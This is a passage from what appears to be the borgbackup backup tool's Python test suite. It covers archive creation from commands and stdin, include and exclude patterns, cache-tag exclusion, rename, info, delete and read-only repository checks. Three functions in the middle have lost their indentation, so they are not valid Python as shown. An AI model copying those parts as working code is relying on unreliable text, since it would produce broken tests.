        name = 'a/b/c'
        self.cmd('create', '--stdin-name', name, '--content-from-command',
                 self.repository_location + '::test', '--', 'echo', input_data)
        item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
        assert item['uid'] == 0
        assert item['gid'] == 0
        assert item['size'] == len(input_data) + 1  # `echo` adds newline
        assert item['path'] == name
        extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test')
        assert extracted_data == input_data + '\n'
    def test_create_content_from_command_with_failed_command(self):
        """A failing --content-from-command command aborts the create and leaves no archive behind."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--content-from-command', self.repository_location + '::test',
                          '--', 'sh', '-c', 'exit 73;', exit_code=2)
        assert output.endswith("Command 'sh' exited with status 73\n")
        archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
        assert archive_list['archives'] == []
    def test_create_content_from_command_missing_command(self):
        """--content-from-command without a command errors out with a clear message."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--content-from-command', self.repository_location + '::test', exit_code=2)
        assert output.endswith('No command given.\n')
    def test_create_paths_from_stdin(self):
        """--paths-from-stdin archives exactly the NUL-delimited paths given on stdin."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file("file1", size=1024 * 80)
        self.create_regular_file("dir1/file2", size=1024 * 80)
        self.create_regular_file("dir1/file3", size=1024 * 80)
        self.create_regular_file("file4", size=1024 * 80)
        input_data = b'input/file1\0input/dir1\0input/file4'
        self.cmd('create', '--paths-from-stdin', '--paths-delimiter', '\\0',
                 self.repository_location + '::test', input=input_data)
        archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
        paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
        # dir1 is taken as-is (no recursion into it), so file2/file3 are absent
        assert paths == ['input/file1', 'input/dir1', 'input/file4']
    def test_create_paths_from_command(self):
        """--paths-from-command archives exactly the newline-delimited paths printed by the command."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file("file1", size=1024 * 80)
        self.create_regular_file("file2", size=1024 * 80)
        self.create_regular_file("file3", size=1024 * 80)
        self.create_regular_file("file4", size=1024 * 80)
        input_data = 'input/file1\ninput/file2\ninput/file3'
        self.cmd('create', '--paths-from-command',
                 self.repository_location + '::test', '--', 'echo', input_data)
        archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
        paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
        assert paths == ['input/file1', 'input/file2', 'input/file3']
    def test_create_paths_from_command_with_failed_command(self):
        """A failing --paths-from-command command aborts the create and leaves no archive behind."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--paths-from-command', self.repository_location + '::test',
                          '--', 'sh', '-c', 'exit 73;', exit_code=2)
        assert output.endswith("Command 'sh' exited with status 73\n")
        archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
        assert archive_list['archives'] == []
    def test_create_paths_from_command_missing_command(self):
        """--paths-from-command without a command errors out with a clear message."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--paths-from-command', self.repository_location + '::test', exit_code=2)
        assert output.endswith('No command given.\n')
    def test_create_without_root(self):
        """Create without a root path is an error (exit code 2)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', exit_code=2)
    def test_create_pattern_root(self):
        """A root can be supplied solely via a '--pattern=R …' root pattern."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
        self.assert_in("A input/file1", output)
        self.assert_in("A input/file2", output)
    def test_create_pattern(self):
        """Include ('+') patterns take precedence over a later exclude ('-') pattern at create time."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('file_important', size=1024 * 80)
        output = self.cmd('create', '-v', '--list',
                          '--pattern=+input/file_important', '--pattern=-input/file*',
                          self.repository_location + '::test', 'input')
        # 'A' = added, 'x' = excluded in the --list output
        self.assert_in("A input/file_important", output)
        self.assert_in('x input/file1', output)
        self.assert_in('x input/file2', output)
    def test_create_pattern_file(self):
        """--patterns-from file patterns combine with command-line --pattern exclusions."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('otherfile', size=1024 * 80)
        self.create_regular_file('file_important', size=1024 * 80)
        output = self.cmd('create', '-v', '--list',
                          '--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
                          self.repository_location + '::test', 'input')
        # 'A' = added, 'x' = excluded in the --list output
        self.assert_in("A input/file_important", output)
        self.assert_in('x input/file1', output)
        self.assert_in('x input/file2', output)
        self.assert_in('x input/otherfile', output)
    def test_create_pattern_exclude_folder_but_recurse(self):
        """test when patterns exclude a parent folder, but include a child"""
        self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
        with open(self.patterns_file_path2, 'wb') as fd:
            # '-' excludes but still recurses, so the '+' include below x can win
            fd.write(b'+ input/x/b\n- input/x*\n')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('x/a/foo_a', size=1024 * 80)
        self.create_regular_file('x/b/foo_b', size=1024 * 80)
        self.create_regular_file('y/foo_y', size=1024 * 80)
        output = self.cmd('create', '-v', '--list',
                          '--patterns-from=' + self.patterns_file_path2,
                          self.repository_location + '::test', 'input')
        self.assert_in('x input/x/a/foo_a', output)
        self.assert_in("A input/x/b/foo_b", output)
        self.assert_in('A input/y/foo_y', output)
    def test_create_pattern_exclude_folder_no_recurse(self):
        """test when patterns exclude a parent folder without recursing, even though a child is included"""
        self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
        with open(self.patterns_file_path2, 'wb') as fd:
            # '!' excludes AND stops recursion, so the '+' include below x cannot win
            fd.write(b'+ input/x/b\n! input/x*\n')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('x/a/foo_a', size=1024 * 80)
        self.create_regular_file('x/b/foo_b', size=1024 * 80)
        self.create_regular_file('y/foo_y', size=1024 * 80)
        output = self.cmd('create', '-v', '--list',
                          '--patterns-from=' + self.patterns_file_path2,
                          self.repository_location + '::test', 'input')
        self.assert_not_in('input/x/a/foo_a', output)
        self.assert_not_in('input/x/a', output)
        self.assert_in('A input/y/foo_y', output)
    def test_create_pattern_intermediate_folders_first(self):
        """test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
        self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
        with open(self.patterns_file_path2, 'wb') as fd:
            fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('x/a/foo_a', size=1024 * 80)
        self.create_regular_file('x/b/foo_b', size=1024 * 80)
        with changedir('input'):
            self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
                     self.repository_location + '::test', '.')

        # list the archive and verify that the "intermediate" folders appear before
        # their contents
        out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
        out_list = out.splitlines()

        # 'd' entries are directories, '-' entries regular files in the {type} column
        self.assert_in('d x/a', out_list)
        self.assert_in('d x/b', out_list)

        assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
        assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
    def test_create_no_cache_sync(self):
        """create --no-cache-sync yields the same cache stats as a normal info, and the repo stays consistent."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('delete', '--cache-only', self.repository_location)
        create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
                                          '--json', '--error'))  # ignore experimental warning
        info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
        create_stats = create_json['cache']['stats']
        info_stats = info_json['cache']['stats']
        assert create_stats == info_stats
        self.cmd('delete', '--cache-only', self.repository_location)
        self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
        self.cmd('info', self.repository_location)
        self.cmd('check', self.repository_location)
    def test_extract_pattern_opt(self):
        """--pattern include/exclude options work on extract: only the included file is restored."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('file_important', size=1024 * 80)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract',
                     '--pattern=+input/file_important', '--pattern=-input/file*',
                     self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
    def _assert_test_caches(self):
        """Extract the test archive and verify only the invalid cache dir (cache2, tag only) survived."""
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
        self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
    def test_exclude_caches(self):
        """create --exclude-caches skips dirs with a valid CACHEDIR.TAG."""
        self._create_test_caches()
        self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
        self._assert_test_caches()
    def test_recreate_exclude_caches(self):
        """recreate --exclude-caches removes valid cache dirs from an existing archive."""
        self._create_test_caches()
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
        self._assert_test_caches()
    def _create_test_tagged(self):
        """Prepare input with dirs tagged via '.NOBACKUP' (file and dir variants) and '00-NOBACKUP'."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('tagged1/.NOBACKUP')
        self.create_regular_file('tagged2/00-NOBACKUP')
        self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
    def _assert_test_tagged(self):
        """Extract the test archive and verify all tagged dirs were excluded entirely."""
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
    def test_exclude_tagged(self):
        """create --exclude-if-present skips dirs containing any of the given tag names."""
        self._create_test_tagged()
        self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
        self._assert_test_tagged()
    def test_recreate_exclude_tagged(self):
        """recreate --exclude-if-present removes tagged dirs from an existing archive."""
        self._create_test_tagged()
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
                 self.repository_location + '::test')
        self._assert_test_tagged()
    def _create_test_keep_tagged(self):
        """Set up dirs excluded via .NOBACKUP1 / .NOBACKUP2 / CACHEDIR.TAG markers.

        'taggedall' carries all three marker kinds at once, to exercise the
        combination of --exclude-if-present and --exclude-caches together.
        """
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file0', size=1024)
        self.create_regular_file('tagged1/.NOBACKUP1')
        self.create_regular_file('tagged1/file1', size=1024)
        self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
        self.create_regular_file('tagged2/file2', size=1024)
        # trailing junk after the magic bytes must still be recognized as a cache tag
        self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
                                 contents=CACHE_TAG_CONTENTS + b' extra stuff')
        self.create_regular_file('tagged3/file3', size=1024)
        self.create_regular_file('taggedall/.NOBACKUP1')
        self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
        self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
                                 contents=CACHE_TAG_CONTENTS + b' extra stuff')
        self.create_regular_file('taggedall/file4', size=1024)
    def _assert_test_keep_tagged(self):
        """Verify --keep-exclude-tags kept each tag file while dropping dir contents."""
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        # the tagged directories themselves survive ...
        self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
        # ... but each contains only its tag marker(s), no payload files
        self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
        self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
        self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
        self.assert_equal(sorted(os.listdir('output/input/taggedall')),
                          ['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
    def test_exclude_keep_tagged(self):
        """'create ... --keep-exclude-tags' must archive the tag files themselves."""
        self._create_test_keep_tagged()
        self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
                 '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
        self._assert_test_keep_tagged()
    def test_recreate_exclude_keep_tagged(self):
        """'recreate ... --keep-exclude-tags' applied to an existing archive."""
        self._create_test_keep_tagged()
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
                 '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
        self._assert_test_keep_tagged()
    @pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
    def test_recreate_hardlinked_tags(self):  # test for issue #4911
        """Regression test: recreate must not crash on a hardlinked CACHEDIR.TAG.

        Reproduces issue #4911, where a hardlink item pointing back at an
        already-seen file raised a KeyError during recreate.
        """
        self.cmd('init', '--encryption=none', self.repository_location)
        self.create_regular_file('file1', contents=CACHE_TAG_CONTENTS)  # "wrong" filename, but correct tag contents
        os.mkdir(os.path.join(self.input_path, 'subdir'))  # to make sure the tag is encountered *after* file1
        os.link(os.path.join(self.input_path, 'file1'),
                os.path.join(self.input_path, 'subdir', CACHE_TAG_NAME))  # correct tag name, hardlink to file1
        self.cmd('create', self.repository_location + '::test', 'input')
        # in the "test" archive, we now have, in this order:
        # - a regular file item for "file1"
        # - a hardlink item for "CACHEDIR.TAG" referring back to file1 for its contents
        self.cmd('recreate', '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
        # if issue #4911 is present, the recreate will crash with a KeyError for "input/file1"
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: xattrs not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: Permission denied\n' in out
assert os.path.isfile(input_abspath)
    def test_path_normalization(self):
        """Paths given with '..' components must be normalized in the archive."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir1/dir2/file', size=1024 * 80)
        with changedir('input/dir1/dir2'):
            # deliberately convoluted relative path; should resolve to input/dir1/dir2
            self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
        output = self.cmd('list', self.repository_location + '::test')
        self.assert_not_in('..', output)
        self.assert_in(' input/dir1/dir2/file', output)
    def test_exclude_normalization(self):
        """Exclude patterns must match regardless of './' prefixes in pattern or path."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        # plain pattern, archiving '.'
        with changedir('input'):
            self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test1')
        self.assert_equal(sorted(os.listdir('output')), ['file2'])
        # pattern with a leading './'
        with changedir('input'):
            self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test2')
        self.assert_equal(sorted(os.listdir('output')), ['file2'])
        # pattern with an embedded '/./' component
        self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test3')
        self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
    def test_repeated_files(self):
        """Passing the same path twice to 'create' must not fail."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input', 'input')
    def test_overwrite(self):
        """Extract must overwrite existing files/empty dirs, but fail on non-empty dirs."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        # Overwriting regular files and directories should be supported
        os.mkdir('output/input')
        os.mkdir('output/input/file1')  # dir where the archive has a file
        os.mkdir('output/input/dir2')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        self.assert_dirs_equal('input', 'output/input')
        # But non-empty dirs should fail
        os.unlink('output/input/file1')
        os.mkdir('output/input/file1')
        os.mkdir('output/input/file1/dir')  # makes file1 a NON-empty directory
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', exit_code=1)
    def test_rename(self):
        """'rename' must rename archives and leave them extractable under the new names."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('create', self.repository_location + '::test.2', 'input')
        self.cmd('extract', '--dry-run', self.repository_location + '::test')
        self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
        self.cmd('rename', self.repository_location + '::test', 'test.3')
        # the other archive must be untouched by the rename
        self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
        self.cmd('rename', self.repository_location + '::test.2', 'test.4')
        self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
        self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
        # Make sure both archives have been renamed
        with Repository(self.repository_path) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        self.assert_equal(len(manifest.archives), 2)
        self.assert_in('test.3', manifest.archives)
        self.assert_in('test.4', manifest.archives)
    def test_info(self):
        """'info' must work on a repository, an archive, and via --first selection."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        info_repo = self.cmd('info', self.repository_location)
        assert 'All archives:' in info_repo
        info_archive = self.cmd('info', self.repository_location + '::test')
        assert 'Archive name: test\n' in info_archive
        # selecting the archive via --first 1 must give the same archive
        info_archive = self.cmd('info', '--first', '1', self.repository_location)
        assert 'Archive name: test\n' in info_archive
    def test_info_json(self):
        """'info --json' must emit well-formed repository, cache and archive metadata."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
        repository = info_repo['repository']
        assert len(repository['id']) == 64  # hex repo id
        assert 'last_modified' in repository
        assert datetime.strptime(repository['last_modified'], ISO_FORMAT)  # must not raise
        assert info_repo['encryption']['mode'] == 'repokey'
        # repokey mode stores the key in the repo, so no keyfile entry
        assert 'keyfile' not in info_repo['encryption']
        cache = info_repo['cache']
        stats = cache['stats']
        assert all(isinstance(o, int) for o in stats.values())
        assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
        info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
        # repo/cache sections must be identical whether queried via repo or archive
        assert info_repo['repository'] == info_archive['repository']
        assert info_repo['cache'] == info_archive['cache']
        archives = info_archive['archives']
        assert len(archives) == 1
        archive = archives[0]
        assert archive['name'] == 'test'
        assert isinstance(archive['command_line'], list)
        assert isinstance(archive['duration'], float)
        assert len(archive['id']) == 64
        assert 'stats' in archive
        assert datetime.strptime(archive['start'], ISO_FORMAT)
        assert datetime.strptime(archive['end'], ISO_FORMAT)
    def test_comment(self):
        """Archive comments: set at create time, and added/modified/cleared/preserved by recreate."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test1', 'input')
        self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
        self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
        self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
        assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
        assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
        self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
        self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
        self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
        # '12345' is a PATH argument (not --comment): recreate without --comment
        # must leave the existing comment untouched
        self.cmd('recreate', self.repository_location + '::test4', '12345')
        assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
        assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
        assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
        assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
    def test_delete(self):
        """'delete' by --prefix, --last, archive name, and with --stats output."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('create', self.repository_location + '::test.2', 'input')
        self.cmd('create', self.repository_location + '::test.3', 'input')
        self.cmd('create', self.repository_location + '::another_test.1', 'input')
        self.cmd('create', self.repository_location + '::another_test.2', 'input')
        self.cmd('extract', '--dry-run', self.repository_location + '::test')
        self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
        # removes another_test.1 and another_test.2
        self.cmd('delete', '--prefix', 'another_', self.repository_location)
        # removes the most recent remaining archive (test.3)
        self.cmd('delete', '--last', '1', self.repository_location)
        self.cmd('delete', self.repository_location + '::test')
        # remaining archive must still be usable after the deletes
        self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
        output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
        self.assert_in('Deleted data:', output)
        # Make sure all data except the manifest has been deleted
        with Repository(self.repository_path) as repository:
            self.assert_equal(len(repository), 1)
    def test_delete_multiple(self):
        """'delete' must accept several archive names in one invocation."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test1', 'input')
        self.cmd('create', self.repository_location + '::test2', 'input')
        self.cmd('create', self.repository_location + '::test3', 'input')
        # delete two archives at once (second given as a bare name)
        self.cmd('delete', self.repository_location + '::test1', 'test2')
        self.cmd('extract', '--dry-run', self.repository_location + '::test3')
        self.cmd('delete', self.repository_location, 'test3')
        # repository must now contain no archives at all
        assert not self.cmd('list', self.repository_location)
    def test_delete_repo(self):
        """Deleting a whole repository must honor BORG_DELETE_I_KNOW_WHAT_I_AM_DOING."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('create', self.repository_location + '::test.2', 'input')
        # with the override set to 'no', deletion is refused (exit code 2) ...
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
        self.cmd('delete', self.repository_location, exit_code=2)
        assert os.path.exists(self.repository_path)
        # ... and with 'YES' it proceeds without prompting
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        self.cmd('delete', self.repository_location)
        # Make sure the repo is gone
        self.assertFalse(os.path.exists(self.repository_path))
    def test_delete_force(self):
        """'delete --force' must delete an archive with a missing content chunk."""
        self.cmd('init', '--encryption=none', self.repository_location)
        self.create_src_archive('test')
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, 'test')
            # corrupt the archive by deleting one chunk of a known file
            for item in archive.iter_items():
                if item.path.endswith('testsuite/archiver.py'):
                    repository.delete(item.chunks[-1].id)
                    break
            else:
                assert False  # missed the file
            repository.commit(compact=False)
        output = self.cmd('delete', '--force', self.repository_location + '::test')
        self.assert_in('deleted archive was corrupted', output)
        # after repair, the archive must be gone from the listing
        self.cmd('check', '--repair', self.repository_location)
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('test', output)
    def test_delete_double_force(self):
        """'delete --force --force' must succeed even with corrupt item metadata."""
        self.cmd('init', '--encryption=none', self.repository_location)
        self.create_src_archive('test')
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, 'test')
            # overwrite the first items-metadata chunk with garbage
            id = archive.metadata.items[0]
            repository.put(id, b'corrupted items metadata stream chunk')
            repository.commit(compact=False)
        self.cmd('delete', '--force', '--force', self.repository_location + '::test')
        self.cmd('check', '--repair', self.repository_location)
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
    def test_readonly_check(self):
        """'check --verify-data' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                self.cmd('check', '--verify-data', self.repository_location, exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('check', '--verify-data', self.repository_location)
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('check', '--verify-data', self.repository_location, '--bypass-lock')
    def test_readonly_diff(self):
        """'diff' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('a')
        self.create_src_archive('b')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
                self.cmd('diff', '%s::a' % self.repository_location, 'b', exit_code=EXIT_ERROR)
            else:
                # in-process: a LockFailed surfaces directly, or wrapped as an RPCError remotely
                with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
                    self.cmd('diff', '%s::a' % self.repository_location, 'b')
                if isinstance(excinfo.value, RemoteRepository.RPCError):
                    assert excinfo.value.exception_class == 'LockFailed'
            # verify that command works with read-only repo when using --bypass-lock
            self.cmd('diff', '%s::a' % self.repository_location, 'b', '--bypass-lock')
    def test_readonly_export_tar(self):
        """'export-tar' on a read-only repo: fails without, works with --bypass-lock."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        with self.read_only(self.repository_path):
            # verify that command normally doesn't work with read-only repo
            if self.FORK_DEFAULT:
